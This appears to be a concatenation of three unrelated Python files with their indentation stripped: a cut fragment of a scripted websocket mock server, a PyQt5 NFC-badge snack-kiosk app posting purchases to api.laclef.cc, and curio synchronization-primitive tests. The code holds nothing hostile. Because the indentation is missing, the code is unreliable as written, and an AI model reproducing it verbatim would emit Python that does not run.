content_start_pos = line.find("{")
content = line[content_start_pos:]
item["content"] = json.loads(content)
if item["type"] == "sent":
self._expecting = item
break
elif item["type"] == "received":
msg = json.dumps(item["content"])
assert self.connections[item["source"]]
await self.connections[item["source"]].send(msg)
async def on_connected(self, source, connection):
self.connections[source] = connection
# self._process_script()
# assert self._expecting["source"] == source
# assert self._expecting["action"] == "connected"
async def on_received(self, source, pack):
if not self._expecting:
await self._process_script()
if pack["aid"] != "peek_message":
assert self._expecting["source"] == source
assert self._expecting["content"] == pack
await self._process_script()
|
app.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from multiprocessing import Pipe
from threading import Thread
import sys, random, math, json, time, requests, subprocess
class laclef_window(QtWidgets.QMainWindow):
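# Touchscreen kiosk UI: waits for an NFC badge scan, shows the snack choices,
# and posts the purchase to the api.laclef.cc backend.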
clicked = QtCore.pyqtSignal()
scanned = QtCore.pyqtSignal(int)
def __init__(self):
super(laclef_window, self).__init__()
self.rpi = False # Set to True if run this code on your RPI
self.test = True # Set to False if you are going to use it for real
self.default_width = 800
self.default_height = 480
self.waiting_for_confirmation = False
self.on_error_page = False
self.uid = ''
self.uid_test = '2a3b7710'
f = open('items.json', 'r')
self.items = json.load(f)
f.close()
self.default_font = 'Kreon'
self.user_name = "Default D."
self.user_solde = 50.0
self.snack_id = 1
self.setupUi(self)
self.setupHome(self)
self.setupErrorPage(self)
self.setupChoices(self)
self.setupDetails(self)
self.setupConfirmation(self)
self.showHome()
#self.showChoices()
def setupUi(self, Frame):
Frame.setObjectName("Frame")
Frame.resize(self.default_width, self.default_height)
font = QtGui.QFont()
font.setFamily(self.default_font)
font.setPointSize(34)
Frame.setFont(font)
def setupHome(self, Frame):
self.frame_homepage = QtWidgets.QFrame(Frame)
self.frame_homepage.setGeometry(QtCore.QRect(0, 0, self.default_width, self.default_height))
self.frame_homepage.setObjectName("frame_homepage")
self.frame_homepage.setAutoFillBackground(True)
self.frame_homepage.setStyleSheet("background: rgba(255, 255, 255, 255);")
self.homepage_label = QtWidgets.QLabel(self.frame_homepage)
self.homepage_label.setGeometry(QtCore.QRect(20, 140, 481, 197))
font = QtGui.QFont()
font.setFamily(self.default_font)
font.setPointSize(34)
self.homepage_label.setFont(font)
self.homepage_label.setAlignment(QtCore.Qt.AlignCenter)
self.homepage_label.setObjectName("homepage_label")
self.homepage_label.setText("Badgez ici \n SVP")
self.widget_home = QtWidgets.QLabel(self.frame_homepage)
self.widget_home.setGeometry(QtCore.QRect(550, 130, 220, 220))
self.widget_home.setObjectName("widget_home")
pic = QtGui.QMovie('imgs/home.gif')
self.widget_home.setMovie(pic)
pic.start()
self.frame_homepage.hide()
def showHome(self):
self.frame_homepage.show()
Thread(target=self.checkForBadge).start()
def hideHome(self):
self.frame_homepage.hide()
def setupErrorPage(self, Frame):
self.frame_errorpage = QtWidgets.QFrame(Frame)
self.frame_errorpage.setGeometry(QtCore.QRect(0, 0, self.default_width, self.default_height))
self.frame_errorpage.setObjectName("frame_errorpage")
self.frame_errorpage.setAutoFillBackground(True)
self.frame_errorpage.setStyleSheet("background: rgba(255, 255, 255, 255);")
self.errorpage_label_up = QtWidgets.QLabel(self.frame_errorpage)
self.errorpage_label_up.setGeometry(QtCore.QRect(40, 140, 481, 51))
self.errorpage_label_up.setAlignment(QtCore.Qt.AlignCenter)
self.errorpage_label_down = QtWidgets.QLabel(self.frame_errorpage)
self.errorpage_label_down.setGeometry(QtCore.QRect(40, 280, 481, 61))
self.errorpage_label_down.setAlignment(QtCore.Qt.AlignCenter)
self.errorpage_label_number = QtWidgets.QLabel(self.frame_errorpage)
self.errorpage_label_number.setGeometry(QtCore.QRect(40, 180, 481, 91))
self.errorpage_label_number.setAlignment(QtCore.Qt.AlignCenter)
self.errorpage_label_alert = QtWidgets.QLabel(self.frame_errorpage)
self.errorpage_label_alert.setGeometry(QtCore.QRect(0, 410, self.default_width, 20))
self.errorpage_label_alert.setAlignment(QtCore.Qt.AlignCenter)
font1 = QtGui.QFont()
font1.setFamily(self.default_font)
font1.setPointSize(11)
font2 = QtGui.QFont()
font2.setFamily(self.default_font)
font2.setPointSize(34)
font3 = QtGui.QFont()
font3.setFamily(self.default_font)
font3.setPointSize(10)
self.errorpage_label_up.setFont(font1)
self.errorpage_label_down.setFont(font1)
self.errorpage_label_number.setFont(font2)
self.errorpage_label_alert.setFont(font3)
self.widget_error = QtWidgets.QLabel(self.frame_errorpage)
self.widget_error.setGeometry(QtCore.QRect(550, 130, 220, 220))
self.widget_error.setObjectName("widget_error")
pic = QtGui.QMovie('imgs/error.gif')
self.widget_error.setMovie(pic)
pic.start()
self.frame_errorpage.hide()
def showErrorPage(self, nbr):
self.errorpage_label_up.setText("Ton badge n'est pas reconnu")
self.errorpage_label_number.setText(f"{nbr}")
self.errorpage_label_down.setText("Envoie le code ci-dessus à \n baptiste.gaultier@imt-atlantique.fr \n Il saura quoi faire")
self.errorpage_label_alert.setText("Touchez l'écran pour revenir à l'acceuil")
self.on_error_page = True
self.frame_errorpage.show()
def showErrorNetwork(self):
self.errorpage_label_up.setText("Réseau indisponible !")
self.errorpage_label_number.setText("")
self.errorpage_label_down.setText("Contactez \n baptiste.gaultier@imt-atlantique.fr \n Il saura quoi faire")
self.errorpage_label_alert.setText("Touchez l'écran pour revenir à l'acceuil")
self.on_error_page = True
self.frame_errorpage.show()
def hideErrorPage(self):
self.frame_errorpage.hide()
def setupChoices(self, Frame):
self.frame_choices = QtWidgets.QFrame(Frame)
self.frame_choices.setGeometry(QtCore.QRect(0, 0, self.default_width, self.default_height))
self.frame_choices.setObjectName("frame_choices")
self.frame_choices.setTabletTracking(True)
self.layoutWidget = QtWidgets.QWidget(self.frame_choices)
self.layoutWidget.setGeometry(QtCore.QRect(3, 111, 801, 291))
self.layoutWidget.setObjectName("layoutWidget")
self.frame_choices.setStyleSheet("background: rgba(252, 254, 252, 255);")
self.Layout_choices = QtWidgets.QVBoxLayout(self.frame_choices)
self.Layout_choices.setSpacing(10)
self.Layout_choices.setObjectName("Layout_choices")
self.choices_label = QtWidgets.QLabel(self.frame_choices)
font = QtGui.QFont()
font.setFamily(self.default_font)
font.setPointSize(17)
self.choices_label.setFont(font)
self.choices_label.setLineWidth(1)
self.choices_label.setGeometry(QtCore.QRect(0, 20, 800, 81))
self.choices_label.setAlignment(QtCore.Qt.AlignCenter)
self.choices_label.setObjectName("label")
self.gridLayoutWidget = QtWidgets.QWidget(self.frame_choices)
self.gridLayoutWidget.hide()
self.gridLayoutWidget.setObjectName("gridLayoutWidget")
self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 120, 800, 400))
self.gridLayout = QtWidgets.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setSizeConstraint(QtWidgets.QLayout.SetNoConstraint)
self.widget_choices = QtWidgets.QLabel(self.frame_choices)
self.widget_choices.setGeometry(QtCore.QRect(0, 0, 101, 101))
self.widget_choices.setObjectName("widget_home")
pic = QtGui.QMovie('imgs/hey.gif')
self.widget_choices.setMovie(pic)
pic.start()
j = 0
k = 0
self.buttons = {}
layout_pos = [(30, 130), (280, 130), (530, 130),
(30, 270), (280, 270), (530, 270)]
# Create buttons
for i in range(6):
b = QtWidgets.QPushButton(self.frame_choices)
b.setMinimumSize(QtCore.QSize(0, 125))
b.setObjectName(str(i))
b.setText("bouton{}".format(i))
f = QtGui.QFont()
f.setFamily(self.default_font)
f.setPointSize(11)
b.setFont(f)
b.setStyleSheet("border-radius: 5px; border:2px solid black; background: white;")
b.setStyleSheet("background: solid grey;")
self.buttons['button{}'.format(i)] = b
self.buttons['button{}'.format(i)].setGeometry(QtCore.QRect(layout_pos[i][0], layout_pos[i][1], 231, 125))
k = k + 1 if k < 2 else 0
j = 1 if i > 1 else 0
self.choices_button_back = QtWidgets.QPushButton(self.frame_choices)
self.choices_button_back.setGeometry(QtCore.QRect(270, 430, 271, 25))
self.choices_button_back.setFlat(True)
f = QtGui.QFont()
f.setFamily(self.default_font)
f.setPointSize(11)
self.choices_button_back.setFont(f)
self.frame_choices.hide()
def showChoices(self):
#Set user name
self.choices_label.setText("Salut {} ! \n On prend quoi aujourd\'hui ?".format(self.user_name))
self.choices_button_back.setText("<-- Je ne prend rien finalement...")
for i in range(6):
self.buttons['button{}'.format(i)].setText(self.items[i]['desc'])
self.buttons['button{}'.format(i)].setObjectName(self.items[i]['id'])
self.buttons['button0'].clicked.connect(lambda: self.hideChoices(self.buttons['button0']))
self.buttons['button1'].clicked.connect(lambda: self.hideChoices(self.buttons['button1']))
self.buttons['button2'].clicked.connect(lambda: self.hideChoices(self.buttons['button2']))
self.buttons['button3'].clicked.connect(lambda: self.hideChoices(self.buttons['button3']))
self.buttons['button4'].clicked.connect(lambda: self.hideChoices(self.buttons['button4']))
self.buttons['button5'].clicked.connect(lambda: self.hideChoices(self.buttons['button5']))
self.choices_button_back.clicked.connect(self.backHome)
self.frame_choices.show()
def backHome(self):
self.frame_choices.hide()
self.showHome()
def hideChoices(self, id):
print('yep')
self.frame_choices.hide()
self.snack_id = id.objectName()
self.showDetails(self, self.snack_id)
def setupDetails(self, Frame):
self.frame_details = QtWidgets.QFrame(Frame)
self.frame_details.setGeometry(QtCore.QRect(0, 0, self.default_width, self.default_height))
self.frame_details.setObjectName("frame_details")
self.frame_details.setStyleSheet("background: rgb(252, 254, 252);")
self.label_detail_price_calcul = QtWidgets.QLabel(self.frame_details)
self.label_detail_price_calcul.setGeometry(QtCore.QRect(280, 230, 281, 41))
self.label_detail_price_calcul.setAlignment(QtCore.Qt.AlignCenter)
self.label_detail_price_calcul.setObjectName("label_detail_price_calcul")
self.label_detail = QtWidgets.QLabel(self.frame_details)
self.label_detail.setGeometry(QtCore.QRect(10, 130, 151, 221))
self.label_detail.setAlignment(QtCore.Qt.AlignCenter)
self.label_detail.setObjectName("label")
font_2 = QtGui.QFont()
font_2.setPointSize(11)
font_2.setFamily(self.default_font)
self.label_detail.setFont(font_2)
self.button_validate = QtWidgets.QPushButton(self.frame_details)
self.button_validate.setGeometry(QtCore.QRect(280, 300, 281, 57))
self.button_validate.setObjectName("button_validate")
self.button_validate.setFont(font_2)
self.button_validate.setStyleSheet("border-radius: 5px; border:4px solid black;")
self.label_detail_price = QtWidgets.QLabel(self.frame_details)
self.label_detail_price.setGeometry(QtCore.QRect(280, 110, 281, 121))
font = QtGui.QFont()
font.setPointSize(70)
font.setFamily(self.default_font)
self.label_detail_price.setFont(font)
self.label_detail_price.setTextFormat(QtCore.Qt.PlainText)
self.label_detail_price.setAlignment(QtCore.Qt.AlignCenter)
self.label_detail_price.setObjectName("label_detail_price")
self.button_minus = QtWidgets.QPushButton(self.frame_details)
self.button_minus.setGeometry(QtCore.QRect(170, 270, 89, 89))
self.button_minus.setObjectName("button_minus")
self.button_minus.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("imgs/moins.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.button_minus.setIcon(icon)
self.button_minus.setIconSize(QtCore.QSize(30, 30))
#self.button_minus.setFont(font_2)
self.button_minus.setStyleSheet("border-radius: 44px; border:4px solid black;")
self.button_back = QtWidgets.QPushButton(self.frame_details)
self.button_back.setGeometry(QtCore.QRect(0, 20, 50, 50))
self.button_back.setObjectName("button_back")
self.button_back.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("imgs/back.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.button_back.setIcon(icon)
self.button_back.setFlat(True)
self.button_back.setFont(font_2)
self.button_plus = QtWidgets.QPushButton(self.frame_details)
self.button_plus.setGeometry(QtCore.QRect(170, 130, 89, 89))
self.button_plus.setObjectName("button_plus")
self.button_plus.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("imgs/plus.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.button_plus.setIcon(icon)
self.button_plus.setIconSize(QtCore.QSize(30, 30))
#self.button_plus.setFont(font_2)
self.button_plus.setStyleSheet("border-radius: 44px; border:4px solid black;")
self.label_detail_price_calcul.setFont(font_2)
self.widget_details = QtWidgets.QLabel(self.frame_details)
self.widget_details.setGeometry(QtCore.QRect(580, 130, 201, 201))
self.widget_details.setObjectName("widget_details")
pic = QtGui.QMovie('imgs/select.gif')
self.widget_details.setMovie(pic)
pic.start()
self.button_plus.clicked.connect(lambda : self.addItem(1))
self.button_minus.clicked.connect(lambda : self.removeItem(1))
self.button_validate.clicked.connect(lambda : self.validate(1))
self.button_back.clicked.connect(self.back)
self.frame_details.hide()
def showDetails(self, Frame, id):
#Get item price and infos
self.price = next((float(self.items[i]['price']) for i in range(6) if self.items[i]['id'] == id), 0)
self.nbr = 1
detail_name = next((self.items[i]['desc'] for i in range(6) if self.items[i]['id'] == id), 0)
self.label_detail_price_calcul.setText("({}x{}€)".format(self.nbr, self.price))
self.label_detail_price.setText("{}€".format(str(round(self.nbr*self.price,3))))
self.label_detail.setText(detail_name)
self.button_validate.setText("Valider")
self.frame_details.show()
def addItem(self, id):
self.nbr = self.nbr + 1
self.label_detail_price.setText("{}€".format(str(round(self.nbr*self.price,3))))
self.label_detail_price_calcul.setText("({}x{}€)".format(self.nbr, self.price))
def removeItem(self, id):
self.nbr = self.nbr - 1 if self.nbr - 1 > 0 else 0
self.label_detail_price.setText("{}€".format(str(round(self.nbr*self.price,3))))
self.label_detail_price_calcul.setText("({}x{}€)".format(self.nbr, self.price))
def validate(self, id):
self.frame_details.hide()
self.showConfirmation(self)
def back(self):
self.frame_details.hide()
self.showChoices()
def setupConfirmation(self, Frame):
self.frame_confirmation = QtWidgets.QFrame(Frame)
self.frame_confirmation.setGeometry(QtCore.QRect(0, 0, self.default_width, self.default_height))
self.frame_confirmation.setObjectName("frame_confirmation")
self.frame_confirmation.setStyleSheet("background: rgb(249, 252, 249);")
self.label_solde = QtWidgets.QLabel(self.frame_confirmation)
self.label_solde.setGeometry(QtCore.QRect(0, 280, 531, 111))
self.label_solde.setAlignment(QtCore.Qt.AlignCenter)
self.label_solde.setObjectName("label_solde")
font2 = QtGui.QFont()
font2.setFamily(self.default_font)
font2.setPointSize(17)
self.label_solde.setFont(font2)
self.label_confirmation = QtWidgets.QLabel(self.frame_confirmation)
self.label_confirmation.setGeometry(QtCore.QRect(0, 126, 531, 191))
self.label_confirmation.setAlignment(QtCore.Qt.AlignCenter)
self.label_confirmation.setObjectName("label_confirmation")
font = QtGui.QFont()
font.setFamily(self.default_font)
font.setPointSize(49)
self.label_confirmation.setFont(font)
self.label_alert = QtWidgets.QLabel(self.frame_confirmation)
self.label_alert.setGeometry(QtCore.QRect(0, 400, self.default_width, 20))
self.label_alert.setAlignment(QtCore.Qt.AlignCenter)
self.label_alert.setObjectName("label_alert")
font3 = QtGui.QFont()
font3.setFamily(self.default_font)
font3.setPointSize(10)
self.label_alert.setFont(font3)
self.widget_confirmation = QtWidgets.QLabel(self.frame_confirmation)
self.widget_confirmation.setGeometry(QtCore.QRect(550, 130, 220, 220))
self.widget_confirmation.setObjectName("widget_confirmation")
pic = QtGui.QMovie('imgs/bisou.gif')
self.widget_confirmation.setMovie(pic)
pic.start()
self.frame_confirmation.hide()
def showConfirmation(self, Frame):
#self.user_solde = self.pay(self.uid_test if self.test else self.uid, self.snack_id, self.nbr)
self.label_confirmation.setText("Merci \n{} !".format(self.user_name))
self.label_solde.setText("Un instant ...")
self.label_alert.setText("Touchez l'écran pour revenir à l'acceuil")
self.waiting_for_confirmation = True
self.frame_confirmation.show()
Thread(target=self.async_paiement, args=(self.uid_test if self.test else self.uid, self.snack_id, self.nbr)).start()
def mousePressEvent(self, event):
if event.buttons() & QtCore.Qt.LeftButton:
print(event.pos())
print("blahblah")
if self.waiting_for_confirmation:
self.frame_confirmation.hide()
self.showHome()
self.waiting_for_confirmation = False
elif self.on_error_page:
self.hideErrorPage()
self.showHome()
self.on_error_page = False
def async_paiement(self, uid, snack_id, qty):
self.user_solde = self.pay(uid,snack_id,qty)
self.label_solde.setText("Ton nouveau solde est de {}€".format(self.user_solde))
def updateData(self):
req = requests.get('http://api.laclef.cc/snacks')
items = [(e['id'], e['description_fr_FR'], e['price']) for e in req.json()['response'] if e['visible'] == '1']
f = open('items.json', 'w')
f.write(json.dumps(items))
f.close()
def pay(self, uid, snack_id, qty):
data = {"uid":uid,"service":1,"order":{"snack_{}".format(snack_id):qty}}
req = requests.post('http://api.laclef.cc/swipes/2', data=json.dumps(data))
print(req.json())
return req.json()['balance']
def getUserInfos(self, uid):
try:
req = requests.get('http://api.laclef.cc/tags/{}'.format(uid))
except Exception as e:
return (None,)
print(req.json()['response'])
if req.json()['response']['owner'] is None:
return None
else:
name = "{} {}.".format(req.json()['response']['owner']['firstname'].capitalize(),req.json()['response']['owner']['lastname'][0].upper())
balance = req.json()['response']['owner']['balance']
return (name, balance)
def checkForBadge(self):
print("start the polling...")
self.scan() if self.rpi else self.scan_test()
def scan(self):
while True:
lines=subprocess.check_output("/usr/bin/nfc-poll", stderr=open('/dev/null','w'))
uid = next((line.decode().replace(' ','').split(':')[1] for line in lines.splitlines() if b'UID' in line), None)
if uid is not None:
self.buzz()
print('Uid: {} '.format(uid))
#uid = uid[:7].replace('0','')
#print(f'Uid (Legacy Code): {uid}')
self.uid = uid
user_infos = self.getUserInfos(self.uid_test if self.test else self.uid)
if user_infos is None:
self.scanned.emit(2)
elif len(user_infos) == 1:
self.scanned.emit(3)
else:
self.user_name = user_infos[0]
self.user_solde = user_infos[1]
self.scanned.emit(1)
break
def buzz(self):
import RPi.GPIO as GPIO
from time import sleep
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
buzzer_pin = 23
timeout = 0.001
stop = 100
count = 0
GPIO.setup(buzzer_pin, GPIO.OUT)
while True:
GPIO.output(buzzer_pin, GPIO.HIGH)
sleep(timeout)
GPIO.output(buzzer_pin, GPIO.LOW)
sleep(timeout)
GPIO.output(buzzer_pin, GPIO.HIGH)
sleep(timeout)
count += 1
if count == stop:
break
def scan_test(self):
while True:
f = open('test.json', 'r')
data = json.load(f)
f.close()
print(data['id'])
# 0: nothing happened, 1: badge exists in db, 2: badge unknown
if data['id'] == 1:
user_infos = self.getUserInfos(self.uid_test)
if user_infos is None:
self.scanned.emit(2)
elif len(user_infos) == 1:
self.scanned.emit(3)
else:
self.user_name = user_infos[0]
self.user_solde = user_infos[1]
self.scanned.emit(1)
break
else:
print("Nope")
time.sleep(3)
def on_event_received(self, val):
print(f"Scanné: {val}")
if val == 1: # Badge known
self.showChoices()
self.hideHome()
elif val == 2: # Badge unknown
self.hideHome()
self.showErrorPage(self.uid_test if self.test else self.uid)
elif val == 3:
self.hideHome()
self.showErrorNetwork()
|
test_sync.py
|
# test_sync.py
#
# Different test scenarios designed to run under management of a kernel
from collections import deque
from curio import *
import pytest
import threading
import time
import asyncio
# ---- Synchronization primitives
class TestEvent:
def test_event_get_wait(self, kernel):
results = []
async def event_setter(evt, seconds):
results.append('sleep')
await sleep(seconds)
results.append('event_set')
await evt.set()
async def event_waiter(evt):
results.append('wait_start')
results.append(evt.is_set())
await evt.wait()
results.append('wait_done')
results.append(evt.is_set())
evt.clear()
results.append(evt.is_set())
async def main():
evt = Event()
t1 = await spawn(event_waiter, evt)
t2 = await spawn(event_setter, evt, 1)
await t1.join()
await t2.join()
kernel.run(main())
assert results == [
'wait_start',
False,
'sleep',
'event_set',
'wait_done',
True,
False
]
def test_event_get_immediate(self, kernel):
results = []
async def event_setter(evt):
results.append('event_set')
await evt.set()
async def event_waiter(evt, seconds):
results.append('sleep')
await sleep(seconds)
results.append('wait_start')
await evt.wait()
results.append('wait_done')
async def main():
evt = Event()
t1 = await spawn(event_waiter, evt, 1)
t2 = await spawn(event_setter, evt)
await t1.join()
await t2.join()
kernel.run(main())
assert results == [
'sleep',
'event_set',
'wait_start',
'wait_done',
]
def test_event_wait_cancel(self, kernel):
results = []
async def event_waiter(evt):
results.append('event_wait')
try:
await evt.wait()
except CancelledError:
results.append('event_cancel')
async def event_cancel(seconds):
evt = Event()
task = await spawn(event_waiter, evt)
results.append('sleep')
await sleep(seconds)
results.append('cancel_start')
await task.cancel()
results.append('cancel_done')
kernel.run(event_cancel(1))
assert results == [
'sleep',
'event_wait',
'cancel_start',
'event_cancel',
'cancel_done',
]
def test_event_wait_timeout(self, kernel):
results = []
async def event_waiter(evt):
results.append('event_wait')
try:
await timeout_after(0.5, evt.wait())
except TaskTimeout:
results.append('event_timeout')
async def event_run(seconds):
evt = Event()
task = await spawn(event_waiter, evt)
results.append('sleep')
await sleep(seconds)
results.append('sleep_done')
await task.join()
kernel.run(event_run(1))
assert results == [
'sleep',
'event_wait',
'event_timeout',
'sleep_done',
]
def test_event_wait_notimeout(self, kernel):
results = []
async def event_waiter(evt):
results.append('event_wait')
try:
await timeout_after(1.0, evt.wait())
results.append('got event')
except TaskTimeout:
results.append('event_timeout')
evt.clear()
try:
await evt.wait()
results.append('got event')
except TaskTimeout:
results.append('bad timeout')
async def event_run():
evt = Event()
task = await spawn(event_waiter, evt)
results.append('sleep')
await sleep(0.25)
results.append('event_set')
await evt.set()
await sleep(1.0)
results.append('event_set')
await evt.set()
await task.join()
kernel.run(event_run())
assert results == [
'sleep',
'event_wait',
'event_set',
'got event',
'event_set',
'got event'
]
class TestLock:
def test_lock_sequence(self, kernel):
results = []
async def worker(lck, label):
results.append(label + ' wait')
results.append(lck.locked())
async with lck:
results.append(label + ' acquire')
await sleep(0.25)
results.append(label + ' release')
async def main():
lck = Lock()
t1 = await spawn(worker, lck, 'work1')
t2 = await spawn(worker, lck, 'work2')
t3 = await spawn(worker, lck, 'work3')
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
'work1 wait',
False,
'work1 acquire',
'work2 wait',
True,
'work3 wait',
True,
'work1 release',
'work2 acquire',
'work2 release',
'work3 acquire',
'work3 release',
]
def test_lock_acquire_cancel(self, kernel):
results = []
async def worker(lck):
results.append('lock_wait')
try:
async with lck:
results.append('never here')
except CancelledError:
results.append('lock_cancel')
async def worker_cancel(seconds):
lck = Lock()
async with lck:
task = await spawn(worker, lck)
results.append('sleep')
await sleep(seconds)
results.append('cancel_start')
await task.cancel()
results.append('cancel_done')
kernel.run(worker_cancel(1))
assert results == [
'sleep',
'lock_wait',
'cancel_start',
'lock_cancel',
'cancel_done',
]
def test_lock_acquire_timeout(self, kernel):
results = []
async def worker(lck):
results.append('lock_wait')
try:
await timeout_after(0.5, lck.acquire())
results.append('never here')
await lck.release()
except TaskTimeout:
results.append('lock_timeout')
async def worker_timeout(seconds):
lck = Lock()
async with lck:
w = await spawn(worker, lck)
results.append('sleep')
await sleep(seconds)
results.append('sleep_done')
await w.join()
kernel.run(worker_timeout(1))
assert results == [
'sleep',
'lock_wait',
'lock_timeout',
'sleep_done',
]
class TestRLock:
def test_rlock_reenter(self, kernel):
results = []
async def inner(lck, label):
results.append(lck.locked())
async with lck:
results.append(label + ' inner acquired')
results.append(label + ' inner releasing')
async def worker(lck, label):
results.append(lck.locked())
results.append(label + ' wait')
async with lck:
results.append(label + ' acquired')
await sleep(0.25)
await inner(lck, label)
results.append(label + ' releasing')
async def worker_simple(lck):
results.append('simple wait')
async with lck:
results.append('simple acquired')
results.append('simple releasing')
async def main():
lck = RLock()
t1 = await spawn(worker, lck, 'work1')
t2 = await spawn(worker, lck, 'work2')
t3 = await spawn(worker_simple, lck)
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
False,
'work1 wait',
'work1 acquired',
True,
'work2 wait',
'simple wait',
True,
'work1 inner acquired',
'work1 inner releasing',
'work1 releasing',
'work2 acquired',
True,
'work2 inner acquired',
'work2 inner releasing',
'work2 releasing',
'simple acquired',
'simple releasing'
]
def test_rlock_notowner(self, kernel):
async def child1(lck):
await lck.acquire()
await sleep(0.25)
await lck.release()
async def child2(lck):
await sleep(0.1)
with pytest.raises(RuntimeError):
await lck.release()
async def main():
lck = RLock()
with pytest.raises(RuntimeError):
await lck.release()
t1 = await spawn(child1, lck)
t2 = await spawn(child2, lck)
await t1.join()
await t2.join()
kernel.run(main)
class TestSemaphore:
def test_sema_sequence(self, kernel):
results = []
async def worker(sema, label):
results.append(label + ' wait')
results.append(sema.locked())
async with sema:
assert sema.value == 0
results.append(label + ' acquire')
await sleep(0.25)
results.append(label + ' release')
async def main():
sema = Semaphore()
t1 = await spawn(worker, sema, 'work1')
t2 = await spawn(worker, sema, 'work2')
t3 = await spawn(worker, sema, 'work3')
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
'work1 wait',
False,
'work1 acquire',
'work2 wait',
True,
'work3 wait',
True,
'work1 release',
'work2 acquire',
'work2 release',
'work3 acquire',
'work3 release',
]
def test_sema_sequence2(self, kernel):
results = []
async def worker(sema, label, seconds):
results.append(label + ' wait')
results.append(sema.locked())
async with sema:
results.append(label + ' acquire')
await sleep(seconds)
results.append(label + ' release')
async def main():
sema = Semaphore(2)
t1 = await spawn(worker, sema, 'work1', 0.25)
t2 = await spawn(worker, sema, 'work2', 0.30)
t3 = await spawn(worker, sema, 'work3', 0.35)
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
'work1 wait', # Both work1 and work2 admitted
False,
'work1 acquire',
'work2 wait',
False,
'work2 acquire',
'work3 wait',
True,
'work1 release',
'work3 acquire',
'work2 release',
'work3 release',
]
def test_sema_acquire_cancel(self, kernel):
results = []
async def worker(lck):
results.append('lock_wait')
try:
async with lck:
results.append('never here')
except CancelledError:
results.append('lock_cancel')
async def worker_cancel(seconds):
lck = Semaphore()
async with lck:
task = await spawn(worker, lck)
results.append('sleep')
await sleep(seconds)
results.append('cancel_start')
await task.cancel()
results.append('cancel_done')
kernel.run(worker_cancel(1))
assert results == [
'sleep',
'lock_wait',
'cancel_start',
'lock_cancel',
'cancel_done',
]
def test_sema_acquire_timeout(self, kernel):
results = []
async def worker(lck):
results.append('lock_wait')
try:
await timeout_after(0.5, lck.acquire())
results.append('never here')
await lck.release()
except TaskTimeout:
results.append('lock_timeout')
async def worker_timeout(seconds):
lck = Semaphore()
async with lck:
w = await spawn(worker, lck)
results.append('sleep')
await sleep(seconds)
results.append('sleep_done')
await w.join()
kernel.run(worker_timeout(1))
assert results == [
'sleep',
'lock_wait',
'lock_timeout',
'sleep_done',
]
class TestCondition:
def test_cond_sequence(self, kernel):
results = []
async def consumer(cond, q, label):
while True:
async with cond:
if not q:
results.append(label + ' wait')
await cond.wait()
item = q.popleft()
if item is None:
break
results.append((label, item))
results.append(label + ' done')
async def producer(cond, q, count, nproducers):
for n in range(count):
async with cond:
q.append(n)
results.append(('producing', n))
await cond.notify()
await sleep(0.1)
for n in range(nproducers):
async with cond:
q.append(None)
results.append(('ending', n))
await cond.notify()
await sleep(0.1)
async def main():
cond = Condition(Lock())
q = deque()
t1 = await spawn(consumer, cond, q, 'cons1')
t2 = await spawn(consumer, cond, q, 'cons2')
t3 = await spawn(producer, cond, q, 4, 2)
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
'cons1 wait',
'cons2 wait',
('producing', 0),
('cons1', 0),
'cons1 wait',
('producing', 1),
('cons2', 1),
'cons2 wait',
('producing', 2),
('cons1', 2),
'cons1 wait',
('producing', 3),
('cons2', 3),
'cons2 wait',
('ending', 0),
'cons1 done',
('ending', 1),
'cons2 done'
]
def test_cond_wait_cancel(self, kernel):
results = []
async def worker(cond):
try:
async with cond:
results.append('cond_wait')
await cond.wait()
results.append('never here')
except CancelledError:
results.append('worker_cancel')
async def worker_cancel(seconds):
cond = Condition()
task = await spawn(worker, cond)
results.append('sleep')
await sleep(seconds)
results.append('cancel_start')
await task.cancel()
results.append('cancel_done')
kernel.run(worker_cancel(1))
assert results == [
'sleep',
'cond_wait',
'cancel_start',
'worker_cancel',
'cancel_done',
]
def test_cond_wait_timeout(self, kernel):
results = []
async def worker(cond):
try:
async with cond:
results.append('cond_wait')
await timeout_after(0.25, cond.wait())
results.append('never here')
except TaskTimeout:
results.append('worker_timeout')
async def worker_cancel(seconds):
cond = Condition()
task = await spawn(worker, cond)
results.append('sleep')
await sleep(seconds)
results.append('done')
await task.join()
kernel.run(worker_cancel(1))
assert results == [
'sleep',
'cond_wait',
'worker_timeout',
'done'
]
def test_cond_notify_all(self, kernel):
results = []
async def worker(cond):
async with cond:
results.append('cond_wait')
await cond.wait()
results.append('wait_done')
async def worker_notify(seconds):
cond = Condition()
t1 = await spawn(worker, cond)
t2 = await spawn(worker, cond)
t3 = await spawn(worker, cond)
results.append('sleep')
await sleep(seconds)
async with cond:
results.append('notify')
await cond.notify_all()
results.append('done')
await t1.join()
await t2.join()
await t3.join()
kernel.run(worker_notify(1))
assert results == [
'sleep',
'cond_wait',
'cond_wait',
'cond_wait',
'notify',
'done',
'wait_done',
'wait_done',
'wait_done',
]
def test_cond_waitfor(self, kernel):
results = []
async def consumer(cond, q, label):
async with cond:
results.append(label + ' waitfor')
await cond.wait_for(lambda: len(q) > 2)
results.append((label, len(q)))
results.append(label + ' done')
async def producer(cond, q, count):
for n in range(count):
async with cond:
q.append(n)
results.append(('producing', n))
await cond.notify()
await sleep(0.1)
async def main():
cond = Condition()
q = deque()
t1 = await spawn(consumer, cond, q, 'cons1')
t2 = await spawn(consumer, cond, q, 'cons2')
t3 = await spawn(producer, cond, q, 4)
await t1.join()
await t2.join()
await t3.join()
kernel.run(main())
assert results == [
'cons1 waitfor',
'cons2 waitfor',
('producing', 0),
('producing', 1),
('producing', 2),
('cons1', 3),
'cons1 done',
('producing', 3),
('cons2', 4),
'cons2 done'
]
def test_condition_error(self, kernel):
async def main():
c = Condition()
with pytest.raises(RuntimeError):
await c.notify()
